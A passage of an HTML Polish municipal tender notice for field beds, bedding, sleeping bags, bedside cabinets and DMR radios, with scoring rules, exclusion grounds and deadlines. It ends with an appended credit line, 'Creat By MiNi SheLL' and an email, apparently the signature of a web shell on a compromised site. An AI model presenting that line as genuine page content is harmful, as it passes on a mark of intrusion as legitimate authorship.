opakowanie, zabezpieczające ją podczas transportu i magazynowania.<br/><br/>Komplety pościeli<br/>Wymiary poszewek zbliżone do wymiarów poduszki i koca. <br/>Rodzaj materiału – satyna (100% poliester np. mikrofibra)<br/>Zapięcia poszewek – zamek błyskawiczny lub podobne umożliwiające szybkie zakładanie.<br/>Kolorystyka w ciemniejszych odcieniach zapewniających estetyczny i praktyczny wygląd. Dopuszcza się kolorystykę wielokolorową.<br/>Możliwość prania w pralce przy zachowaniu walorów użytkowych i trwałości po praniu.<br/>Każdy komplet pościeli powinien być zapakowany indywidulanie w szczelne, łatwo otwieralne opakowanie, zabezpieczające produkt podczas transportu i magazynowania.<br/>Prześcieradła z gumką<br/>Rozmiar umożliwiający zastosowanie do materaca łóżka polowego (szerokość 90-100 cm x długość ok. 200-210 cm)<br/>Materiał – dżersej lub podobna tkanina o zawartości do 50% poliester, reszta bawełna)<br/>Kolorystyka w ciemniejszych odcieniach zapewniających estetyczny i praktyczny wygląd.<br/>Możliwość prania w pralce przy zachowaniu walorów użytkowych i trwałości po praniu.<br/>Każdy produkt powinien być zapakowany w opakowanie, zabezpieczające go podczas transportu i magazynowania.<br/><br/>Śpiwory typu kołdra:<br/>Wykonanie - z odpornej na pleśń i nie absorbującej wilgoci oraz łatwej do prania tkaniny wyposażonej w dwusuwakowy zamek błyskawiczny umożliwiający rozpięcie śpiwora.<br/>Zewnętrzna powłoka typu rip-stop, wnętrze-bawełna, wypełnienie-lekka, puszysta, nie absorbująca wilgoci włóknina lub tkanina o zbliżonych parametrach i właściwościach.<br/>Wymiary 190-200 cm x 70-80 cm<br/>Kolorystyka – granatowy i/lub czarny i/lub ciemnozielony, dopuszcza się wnętrze wielobarwne<br/>Możliwość prania w pralce przy zachowaniu walorów użytkowych i trwałości po praniu.<br/>Każdy produkt powinien być zapakowany w indywidulane opakowanie lub worek, zabezpieczające go podczas transportu i magazynowania.<br/><br/>Szafki przyłóżkowe medyczne:<br/>Wymiary: szerokość 45-50 cm, głębokość 45-50 cm, wysokość 75-80cm.<br/>Materiał wykonania – tworzywo ABS lub materiał podobny o nietoksycznych właściwościach, odporny na rdzę i korozję, łatwy do utrzymania w czystości oraz umożliwiający długotrwałe użytkowanie<br/>Szafka wyposażona w wysuwany stolik na spożywanie pokarmów, 1 lub 2 wieszaki na ręczniki, 1 lub 2 szuflady, kółka transportowe. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39522520-8 - Łóżka polowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39143123-4 - Stoliki nocne</p> <p class="mb-0">39522540-4 - Śpiwory</p> <p class="mb-0">39511100-8 - Koce</p> <p class="mb-0">39512000-4 - Bielizna pościelowa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1. Zamawiający będzie oceniał oferty według następującego kryterium:<br/>1) Cena - waga 60%<br/>2) Skrócenie terminu dostawy - waga 40%<br/><br/>17.2. Punkty przyznawane za podane w pkt. 17.1. kryteria będą liczone według następujących wzorów:<br/>1) Cena:<br/>(Cmin/Cof) * 100 * waga<br/>gdzie:<br/>- Cmin - najniższa cena spośród wszystkich ofert niepodlegających odrzuceniu<br/>- Cof - cena podana w ofercie badanej<br/><br/>2) Skrócenie terminu dostawy:<br/>Podstawowy termin dostaw to 30 dni od dnia podpisania umowy. Wykonawca otrzyma punkty w kryterium:<br/>20 pkt – za zaoferowanie skrócenia terminu dostawy do 21 dni od dnia podpisania umowy,<br/>40 pkt - za zaoferowanie skrócenia terminu dostawy do 14 dni od dnia podpisania umowy.<br/>W przypadku niezaznaczenia żadnego pola albo zaznaczenie obu pól Zmawiający przyzna 0 pkt w tym kryterium i przyjmie, że wykonawca zaoferował realizację dostaw w terminie podstawowym.<br/><br/>17.3. Oferta złożona przez wykonawcę może otrzymać 100 pkt.<br/><br/>17.4. W toku dokonywania badania i oceny ofert zamawiający może żądać udzielenia przez wykonawcę wyjaśnień treści złożonych<br/>przez niego ofert.<br/><br/>17.5. Zamawiający zastosuje zaokrąglanie każdego wyniku do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest 10 kompletów radiotelefonów przenośnych cyfrowo-analogowych z ładowarkami sieciowymi typu biurkowego (1 komplet: 1 radiotelefon + 1 ładowarka)<br/><br/>Wymagania:<br/>Radiotelefon z pełną klawiaturą i wyświetlaczem<br/>Zakres VHF częstotliwość 136-174 MHz<br/>Wi-Fi – 2,4/5,0 GHz<br/>Zgodność z protokołem bezpieczeństwa Wi-Fi WPA3<br/>Bluetooth 5,2<br/>Protokół cyfrowy – DMR Tier II<br/>Możliwość szyfrowania korespondencji w trybie cyfrowym algorytmem ARC4 – 40 bit<br/>Sygnalizacja cyfrowa i analogowa<br/>Moc wyjściowa: wysoka – 5 W, niska 1 W<br/>Odstęp międzykanałowy - 12,5 kHz<br/>Pojemność – 1000 kanałów<br/>Wyświetlacz – 2,4 ‘’, 320x240 pikseli , QVGA <br/>Możliwość obsługi głosu i danych w języku polskim<br/>Przycisk alarmowy<br/>6 programowalnych przycisków<br/>Zasilanie - akumulator litowo-jonowy o pojemności nie mniejszej niż 2200 mAh<br/>Stopień ochrony – minimum IP:68 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32236000-6 - Radiotelefony</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1. Zamawiający będzie oceniał oferty według następującego kryterium:<br/>1) Cena - waga 60%<br/>2) Skrócenie terminu dostawy - waga 40%<br/><br/>17.2. Punkty przyznawane za podane w pkt. 17.1. kryteria będą liczone według następujących wzorów:<br/>1) Cena:<br/>(Cmin/Cof) * 100 * waga<br/>gdzie:<br/>- Cmin - najniższa cena spośród wszystkich ofert niepodlegających odrzuceniu<br/>- Cof - cena podana w ofercie badanej<br/><br/>2) Skrócenie terminu dostawy:<br/>Podstawowy termin dostaw to 30 dni od dnia podpisania umowy. Wykonawca otrzyma punkty w kryterium:<br/>20 pkt – za zaoferowanie skrócenia terminu dostawy do 21 dni od dnia podpisania umowy,<br/>40 pkt - za zaoferowanie skrócenia terminu dostawy do 14 dni od dnia podpisania umowy.<br/>W przypadku niezaznaczenia żadnego pola albo zaznaczenie obu pól Zmawiający przyzna 0 pkt w tym kryterium i przyjmie, że wykonawca zaoferował realizację dostaw w terminie podstawowym.<br/><br/>17.3. Oferta złożona przez wykonawcę może otrzymać 100 pkt.<br/><br/>17.4. W toku dokonywania badania i oceny ofert zamawiający może żądać udzielenia przez wykonawcę wyjaśnień treści złożonych<br/>przez niego ofert.<br/><br/>17.5. Zamawiający zastosuje zaokrąglanie każdego wyniku do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	oświadczenie o którym mowa w art. 125 ust. 1 Ustawy tj. oświadczenie o niepodleganiu wykluczeniu – według wzoru stanowiącego załącznik nr 3 do SWZ (składane do oferty),<br/><br/>b)	oświadczenie o niepodleganiu wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2 2025r. poz. 514) – według wzoru stanowiącego załącznik nr 3 do SWZ (składane do oferty),<br/><br/>c)	odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania (składane do oferty) (Wykonawca nie jest zobowiązany do złożenia niniejszych dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskaże Zamawiającemu dane umożliwiające dostęp do tych dokumentów).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający wymaga złożenia przedmiotowych środków dowodowych:<br/>Wypełniony zał. nr 1 - Opis Przedmiotu Zamówienia dla części nr 1-3 w zakresie potwierdzenia spełnienia minimalnych wymagań przez oferowany przedmiot zamówienia. Wykonawca wypełnia niniejszy załącznik w zakresie części, na którą składa ofertę.<br/><br/>Jeżeli Wykonawca nie złoży przedmiotowego środka dowodowego wraz z ofertą lub złożony przedmiotowy środek dowodowy będzie niekompletny, Zamawiający wezwie Wykonawcę w wyznaczonym terminie do jego złożenia lub uzupełnienia na podstawie art. 107 ust. 2 pzp. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> zał. nr 1 - Opis Przedmiotu Zamówienia dla części nr 1-3 w zakresie potwierdzenia spełnienia minimalnych wymagań przez oferowany przedmiot zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany postanowień umowy<br/>1.	Wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważno-ści.<br/>2.	Na podstawie art. 455 Ustawy Pzp, Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w następujących przypadkach:<br/>1)	zmiany wynagrodzenia Wykonawcy – jeśli na podstawie odrębnych przepisów na-stąpią zmiany stawek podatku: w takiej sytuacji stosuje się stawkę podatku VAT aktualną na dzień wystawienia faktury VAT,<br/>2)	aktualizacji danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy, zmianę adresu siedziby, zmianę formy prawnej itp.,<br/>3)	zmiany terminów realizacji przedmiotu zamówienia z przyczyn niezależnych od Wykonawcy lub Zamawiającego, w szczególności w przypadku okoliczności wy-stąpienia siły wyższej (tj. zdarzenia zewnętrznego, niemożliwego lub prawie nie-możliwego do przewidzenia, którego skutkom nie można zapobiec np. wprowa-dzenie zakazów w związku ze stanem epidemii lub stanem zagrożenia epidemiolo-gicznego jak również negatywny wpływ konfliktu zbrojnego, uniemożliwiają-cym/wstrzymującym realizację przedmiotu zamówienia, nieobowiązujących w da-cie zawarcia umowy, strajki generalne, działania zbrojne, wywłaszczenia, etc.), mającego bezpośredni wpływ na termin wykonania przedmiotu zamówienia lub z powodu działania osób trzecich, które to przyczyny każda ze Stron musi udoku-mentować,<br/>4)	zmiany dotyczącej dostarczanych elementów przedmiotu zamówienia w sytuacji, gdy nastąpi wycofanie danego modelu (typu, wersji) z produkcji przez producenta albo jeśli dostarczane urządzenie nie jest dostępne na rynku, a dostępne będzie urządzenie o parametrach nie gorszych niż wynikające z SWZ, umowy i oferty Wykonawcy, pod warunkiem, że nowa cena nie będzie wyższa niż wskazana w ofercie (tzn. elementy zamienne mogą mieć cenę niższą albo równą cenie oferto-wej), fakt ten Wykonawca musi pisemnie udokumentować,<br/>5)	zmniejszenia zakresu i ilości dostarczanych elementów przedmiotu zamówienia oraz związane z tym zmniejszenie wartości umowy, wynikające z przyczyn nieza-leżnych od Zamawiającego lub Wykonawcy, które to przyczyny każda ze Stron musi udokumentować,<br/>6)	zmiany dotyczącej dostarczanych elementów przedmiotu zamówienia albo terminu realizacji przedmiotu zamówienia w sytuacji, gdy powstała możliwość zastosowa-nia nowszych i korzystniejszych dla Zamawiającego rozwiązań technologicznych, technicznych lub w dziedzinie oprogramowania, niż te istniejące w chwili zawarcia umowy.<br/>3.	W przypadku zaistnienia którejkolwiek z wyżej wymienionych przesłanek, strona umowy zobowiązana jest do złożenia pisemnego wniosku o zmianę postanowień umowy.<br/>4.	Wniosek, o którym mowa pod w ust. 4 musi zawierać:<br/>1)	przywołanie okoliczności faktyczne wskazane w ust. 3,<br/>2)	opis propozycji zmiany,<br/>3)	uzasadnienie zmiany,<br/>4)	opis wpływu zmiany na warunki realizacji umowy.<br/>5.	Wszelkie zmiany zapisów umowy winny być dokonywane w formie aneksu do umowy na piśmie pod rygorem nieważności oraz za zgodą obu stron. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-31 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platforma &#34;Asystent postępowania&#34;, miejsce otwarcia: Urząd Gminy w Makowie, ul. Akacjowa 2A, 96-124 Maków</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-31 10:20</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z postępowania wyklucza się Wykonawcę na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r. poz. 1497 z późn. zm).<br/><br/>W celu poświadczenia, iż brak jest podstaw do wykluczenia Wykonawcy z postępowania o udzielenie zamówienia, Wykonawca zobowiązany jest złożyć: oświadczenie o niepodleganiu wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2024 r. poz. 507) – według wzoru stanowiącego załącznik nr 2 do SWZ (składane do oferty).

Creat By MiNi SheLL
Email: jattceo@gmail.com